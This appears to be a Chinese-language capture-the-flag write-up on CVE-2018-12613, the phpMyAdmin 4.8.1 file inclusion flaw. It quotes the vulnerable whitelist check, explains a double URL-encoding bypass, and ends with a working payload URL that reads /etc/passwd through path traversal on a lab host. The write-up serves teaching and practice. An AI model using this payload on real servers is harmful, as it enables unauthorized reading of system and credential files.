該題考查cve-2018-12613-PhpMyadmin后台文件包含漏洞
使用御劍進行掃描發現phpmyadmin/目錄,無需密碼便可以進入
查看相關版本信息
百度一下發現phpmyadmin4.8.1版本文件包含漏洞,問題出在index.php的target參數位置
// If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; }
$target_blacklist,target參數黑名單
$target_blacklist = array ( 'import.php', 'export.php' );
Core::checkPageValidity($_REQUEST['target']),Core類參數校驗方法
1 public static function checkPageValidity(&$page, array $whitelist = []) 2 { 3 if (empty($whitelist)) { 4 $whitelist = self::$goto_whitelist; 5 } 6 if (! isset($page) || !is_string($page)) { 7 return false; 8 } 9 10 if (in_array($page, $whitelist)) { 11 return true; 12 } 13 14 $_page = mb_substr( 15 $page, 16 0, 17 mb_strpos($page . '?', '?') 18 ); 19 if (in_array($_page, $whitelist)) { 20 return true; 21 } 22 23 $_page = urldecode($page); 24 $_page = mb_substr( 25 $_page, 26 0, 27 mb_strpos($_page . '?', '?') 28 ); 29 if (in_array($_page, $whitelist)) { 30 return true; 31 } 32 33 return false; 34 }
問題在於第23行的urldecode($page)方法,存在二次編碼繞過
$_page = urldecode($page);
%25的url編碼為% %3f的url編碼為? %253f-->?
payLoad:
這里target參數只要不是黑名單中php文件就可以
http://725a4060-e628-4f9f-801a-e96075cbfca8.node3.buuoj.cn/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd
flag應該位於系統的根目錄
